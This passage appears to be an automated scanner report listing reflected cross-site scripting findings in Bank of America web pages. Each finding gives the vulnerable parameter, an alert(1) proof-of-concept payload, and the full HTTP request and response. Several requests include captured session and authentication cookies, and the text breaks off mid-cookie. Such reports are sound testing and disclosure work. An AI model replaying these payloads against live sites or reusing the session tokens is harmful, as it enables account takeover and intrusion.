1.10. https://idprotect.bankofamerica.com/code.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://idprotect.bankofamerica.com
Path:	/code.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f222a"-alert(1)-"d254ee0790e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /code.asp?f222a"-alert(1)-"d254ee0790e=1 HTTP/1.1
Host: idprotect.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8354
Content-Type: text/html
Expires: Wed, 05 Oct 2011 21:35:11 GMT
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:15:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>


<title>Bank of America | Identi
...[SNIP]...

...[SNIP]...

1.11. https://pages.emcom.bankofamerica.com/sourcepoint/ [tracking parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://pages.emcom.bankofamerica.com
Path:	/sourcepoint/

Issue detail

The value of the tracking request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65b61'%3balert(1)//5d73ea79873 was submitted in the tracking parameter. This input was echoed as 65b61';alert(1)//5d73ea79873 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sourcepoint/?tracking=SiteMap65b61'%3balert(1)//5d73ea79873&cm_sp=EBZ-SourcePoint-_-2010%20Q3-_-FH16LT0001_mks_sitemap_SourcePointLink HTTP/1.1
Host: pages.emcom.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Oct 2011 13:53:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=dhi4lofasywbu4fl0artouso; path=/; secure; HttpOnly
Vary: Accept
Cache-Control: private
Content-Type: text/html; charset=US-ASCII
Content-Length: 23976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="eng_US">
<head>
   <meta http-e
...[SNIP]...
onse(responseText, statusText) {

           if(responseText.search(/SP=OK/) != -1) {

            document.sp_subscr_form.action='https://pages.emcom.bankofamerica.com/sourcepoint/authen/?tracking=SiteMap65b61';alert(1)//5d73ea79873&userStatus=new';
            document.sp_subscr_form.submit();

           } else if (responseText.search(/SP=SUB/) != -1) {

            GeneralModals("https://pages.emcom.bankofamerica.com/page.aspx?QS=38dfbe49
...[SNIP]...

1.12. https://pages.emcom.bankofamerica.com/sourcepoint/ [tracking parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://pages.emcom.bankofamerica.com
Path:	/sourcepoint/

Issue detail

The value of the tracking request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59f7a"style%3d"x%3aexpression(alert(1))"e7d5db5031c was submitted in the tracking parameter. This input was echoed as 59f7a"style="x:expression(alert(1))"e7d5db5031c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /sourcepoint/?tracking=SiteMap59f7a"style%3d"x%3aexpression(alert(1))"e7d5db5031c&cm_sp=EBZ-SourcePoint-_-2010%20Q3-_-FH16LT0001_mks_sitemap_SourcePointLink HTTP/1.1
Host: pages.emcom.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Oct 2011 13:53:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=i5ybqkcwph0ykept2h0wdxso; path=/; secure; HttpOnly
Vary: Accept
Cache-Control: private
Content-Type: text/html; charset=US-ASCII
Content-Length: 24014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="eng_US">
<head>
<meta http-e
...[SNIP]...
<form action="https://pages.emcom.bankofamerica.com/newuser_signup_click/?tracking=SiteMap59f7a"style="x:expression(alert(1))"e7d5db5031c&action=new" name="sp_subscr_form" id="sp_subscr_form" method="post">
...[SNIP]...

1.13. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the FailureLogon request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0fe5"-alert(1)-"1d0f18c7e2e was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserIDd0fe5"-alert(1)-"1d0f18c7e2e&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33782
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:01:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
function GoPage(page)
{
var sSQuery = "FailureLogon=WrongUserIDd0fe5"-alert(1)-"1d0f18c7e2e&ResCode=-34";

if ( page == "elert" )
{
   top.location.href= 'https://idprotect.bankofamerica.com/code.asp?Fr=Re'
   //top.location.href= 'https://test8.intersections.com/code.asp?Fr=Re'
}

...[SNIP]...

1.14. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the FailureLogon request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb9a"><a>d0178379f41 was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserID4fb9a"><a>d0178379f41&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33982
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:00:47 GMT

   <script type="text/javascript">
       alert ("Special Characters are not allowed.");
       location.href = "http://www.bankofamerica.com";
   </script>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Tr
...[SNIP]...
<a class="menu" title="Home" name="Home_Header_Login.asp" href="https://privacyassist.bankofamerica.com/home.asp?FailureLogon=WrongUserID4fb9a"><a>d0178379f41&ResCode=-34">
...[SNIP]...

1.15. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [FailureLogon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the FailureLogon request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdde'-alert(1)-'0aa2c8645e6 was submitted in the FailureLogon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserID2bdde'-alert(1)-'0aa2c8645e6&ResCode=-34 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; mbox=check#true#1317908711|session#1317908650691-331415#1317910511; state=CT; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; TLTSID=AB41EFC4F01A10F02BCAA1CC4F75D944; TLTUID=AB41EFC4F01A10F02BCAA1CC4F75D944; ORIGINATIONS.BANKOFAMERICA.COM=TALvJZKoQr6u6/6q2Mh6zXJSp5UQQCJEe1V1MMuuqFhMv1nEWYrMuP+/kgpQ40hdqnZF9hug8mIY3QPj7KEn0YgTL04RIZV+a0Ajm1e9+GzdAk9f+cJSOsx4R41b1wwCnyhzgYUdwlXW3JDwiRp8GJ1jzzKGlYS9QikpMTxbtXCij8JulCFjf7fNJ1LVsa4ua3ZMOdGBXTpTIIDZeN1PeF/hc8JXiogC0TW41AqO5STuulSgaSjFrhA5YcMiWNB296Asc4TrBZBEXW7i7zjY3FP35QPGm2T4Ng4n5QLyohoCzOSsKxni40vp/dabJ+9CcKUDy4MraqU8GcRbqCn+nG8fSs+FtGg99BJHt+mtmAYBi8lPniCjxIs13dQgTZj8eO4mL6Jy+teuYD54JkP1l6N5U2eFo0c41D7SDhyaz7+V3K61qL69lPLidsC1k5DGSk3ahuqysZEaoaDTzWTpandLdnPHTUWyJlP5uXpvnPM4pQGibHP7qtFrEWJ5gJzVpEyb/Z9Aq3XxjHza51CSxqdcuZJKtgVIVfHNHP9IIPAV8lAoL3C5Ox8q8m00KZgnFLoGbKy784eq/9fPSCwDheMJ4HPkX4Yb6sfunCl27ankZXXSq0HHpQIG+UQpwVviWBzTd3wlXsi8Yu0x0AH6KPSYb9tSaPlZ2XFysogotz7WpsWe6K/r5VJMgCk+uyN8cUj+6Ke4DZpXJaTyOZFAcLf1gZJH+Y+ryCjWQ6iojwm/o4mXYx2h9OGFLiT106iqiesLR/hYmxgjwMCGxljMLUBgeGbh3O+AdLbL0gtz2mom3ZIo2G68TEDLOq2mC7Z/Vt/ufkaUiI8i0bZOZ3/FCuac91MblR/Bb09XvT5kJoZ1/LOiQmcaSky8pB6+EZsIK7fHimS10MA+Ww6yRm6dKquTufw7rLHbPJHmlp9NPuZYdQqFymdXF73iFp0EelN0+/cbQRPZVIXv7x7HrQ0wwWsG6plgreVK8VKeJIczjmzfszI9N75ax3sddxtYDKvC; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1317909171194; ASPSESSIONIDCUDAQBDB=LGGGDNKCCJLBJOBHPMKAIFDJ; throttle_value=72; cmRS=&t1=1317909328081&t2=1317909332052&t3=1317909367524&lti=1317909367524&ln=Log_into_your_Bank_of_America_Privacy_Assist_online_account_Login&hr=javascript%3ASubmit&fti=1317909367519&fn=InsContentProtectPrivAsstLogin_frmLogon%3A0%3B&ac=0:S&fd=0%3A14%3AtxtUserID%3B0%3A15%3AtxtPassword%3B&uer=&fu=https%3A//privacyassist.bankofamerica.com/Pages/Asp/IN_PostLogon.asp&pi=Ins%3AContent%3AProtect%3APrivAsst%3BLogin&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33782
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Thu, 06 Oct 2011 14:01:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<!--
                           var strHref = 'https://' + 'privacyassist.bankofamerica.com' + '/pages/english/in_activation.asp' + '?FailureLogon=WrongUserID2bdde'-alert(1)-'0aa2c8645e6&ResCode=-34';
                           strHref = strHref.toLowerCase()
                           if (strHref.indexOf('lm_fraudprotect') < 0 && strHref.indexOf('lm_cardregistry') < 0 && strHref.indexOf('lm_creditreport') < 0 )
                           {
...[SNIP]...

1.16. https://privacyassist.bankofamerica.com/Pages/English/IN_Activation.asp [ResCode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://privacyassist.bankofamerica.com
Path:	/Pages/English/IN_Activation.asp

Issue detail

The value of the ResCode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9bf2'-alert(1)-'304d6ee0574 was submitted in the ResCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Pages/English/IN_Activation.asp?FailureLogon=WrongUserID&ResCode=-34d9bf2'-alert(1)-'304d6ee0574 HTTP/1.1
Host: privacyassist.bankofamerica.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=210832650.108559369.1317146892.1317146892.1317146892.1; __utmz=210832650.1317146892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SURVEY_SHOWN_IN_LAST_6_MONTHS=N; CM_RegCustID=20110927:0:O:7779c380-132a-a87a-48565017779c3801; BOA_COM_BT_ELIGIBLE=No; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; hp_pf_anon=anon=((ct=+||fn=+||lang=en_US||st=+||zc=+)); BOA_0020=20110927:0:O:7779c380-132a-a87a-48565017779c3801; WAOR=1717870507.281.0000; cmTPSet=Y; SMIDENTITY=BOjgHh7pIR9VuQaUQOGrSuU44ScdfTCeoBcqkA62znxyHHVi7phxb1ABWeIEVtOLpq05ENXE4JU6JqCSamUKelXrP/zUi25oimxc8a6Pt1SEbC3lP+090dyFE0lXa6kgFM1htaCbvrILjjCIS5yEaXSPlREFJMlGTsTa6aSz+tDAPZLlPjhFyXKZTvW4e1E1G3hQKZ6DrmtfZli3PXeawL2yB+QbzvCGWgw0Jwoo5RU8Rf3H8JaI0jsK4eih6Q93avGLATZa4osn+GE5LgtxEWwmQRGQ5eYd27NhT9ibkdZejrfMe4vS9wq/YVPxFzw9lublol9S5txrJW0fbXfsokdEWSJqdWY03C1YWUp/Nz37cOe8AdRyedDGnrPfsXjXASHAivqQQDrIu2vx7/JpT/5GzDHaX/8PC/ncQgtGKjzqF+q7LhyvahfFyP9awUweg+EAEGP4UjR7OdiD1IDWAoHsFLF2IbI9pph++w73rwg8cZOk+jW047J75kFUUDqv; BOA_ADVISOR=SAV%3A2; GMDEALER=false; GMDEALERSECURE=false; GMREFERRAL=false; GMREFERRALSECURE=false; TCID=0007b16b-f1e9-be5a-87b0-cd4a0000001e; 